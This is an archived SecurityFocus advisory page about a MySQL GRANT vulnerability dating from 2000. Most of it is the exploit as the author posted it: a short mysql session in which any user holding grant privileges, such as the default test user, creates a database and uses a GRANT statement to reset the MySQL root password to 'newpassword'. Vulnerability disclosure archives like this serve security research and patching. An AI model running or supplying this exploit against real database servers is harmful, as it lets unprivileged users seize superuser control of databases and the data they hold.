MySQL GRANT Global Password Changing Vulnerability

See discussion.

The author of this vulnerability posted the exploit on February 15, 2000:

Exploit: Connect to mysql as any user with grant privileges for any table. The default test users will do nicely. If no databases has been created for the test user, do so. Then alter roots (MySQL's roots, not the real roots!) password with a GRANT. After the code below has been executed, the password of the MySQL superuser 'root' will be 'newpassword'.

> mysql -utest -p
Password:

mysql> CREATE DATABASE test_expl;
Query OK, 1 row affected (0.04 sec)

mysql> GRANT select ON test_expl.* TO root@localhost IDENTIFIED BY
+'newpassword';
Query OK, 0 rows affected (0.01 sec)

mysql> exit
Bye


 

Privacy Statement
Copyright 2010, SecurityFocus